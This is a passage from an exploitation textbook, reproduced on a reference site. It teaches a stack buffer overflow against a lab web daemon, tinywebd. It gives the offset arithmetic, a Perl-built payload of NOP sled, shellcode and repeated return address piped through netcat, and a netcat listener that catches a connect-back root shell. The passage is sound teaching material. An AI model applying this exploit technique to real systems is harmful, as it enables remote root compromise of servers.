Graphics Programs Reference
In-Depth Information
The debugger shows that the request buffer starts at
0xbffff5c0
and the
stored return address is at
0xbffff7dc
, which means the offset is 540 bytes.
The safest place for the shellcode is near the middle of the 500-byte request
buffer. In the output below, an exploit buffer is created that sandwiches the
shellcode between a NOP sled and the return address repeated 32 times. The
128 bytes of repeated return address keep the shellcode out of unsafe stack
memory, which might be overwritten. There are also unsafe bytes near the
beginning of the exploit buffer, which will be overwritten during null termina-
tion. To keep the shellcode out of this range, a 100-byte NOP sled is put in
front of it. This leaves a safe landing zone for the execution pointer, with the
shellcode at
0xbffff624
. The following output exploits the vulnerability using
the loopback shellcode.
reader@hacking:~/booksrc $ ./tinywebd
Starting tiny web daemon.
reader@hacking:~/booksrc $ wc -c loopback_shell
83 loopback_shell
reader@hacking:~/booksrc $ echo $((540+4 - (32*4) - 83))
333
reader@hacking:~/booksrc $ nc -l -p 31337 &
[1] 9835
reader@hacking:~/booksrc $ jobs
[1]+ Running nc -l -p 31337 &
reader@hacking:~/booksrc $ (perl -e 'print "\x90"x333'; cat loopback_shell; perl -e 'print "\
x24\xf6\xff\xbf"x32 . "\r\n"') | nc -w 1 -v 127.0.0.1 80
localhost [127.0.0.1] 80 (www) open
reader@hacking:~/booksrc $ fg
nc -l -p 31337
whoami
root
Since the offset to the return address is 540 bytes, 544 bytes are needed
to overwrite the address. With the loopback shellcode at 83 bytes and the
overwritten return address repeated 32 times, simple arithmetic shows that
the NOP sled needs to be 333 bytes to align everything in the exploit buffer
properly. netcat is run in listen mode with an ampersand (
&
) appended to
the end, which sends the process to the background. This listens for the con-
nection back from the shellcode and can be resumed later with the command
fg
(foreground). On the LiveCD, the at (
@
) symbol in the command prompt
will change color if there are background jobs, which can also be listed with
the
jobs
command. When the exploit buffer is piped into netcat, the
-w
option
is used to tell it to time out after one second. Afterward, the backgrounded
netcat process that received the connectback shell can be resumed.
All this works fine, but if a shellcode of different size is used, the NOP
sled size must be recalculated. All these repetitive steps can be put into a
single shell script.
The BASH shell allows for simple control structures. The
if
statement at
the beginning of this script is just for error checking and displaying the usage
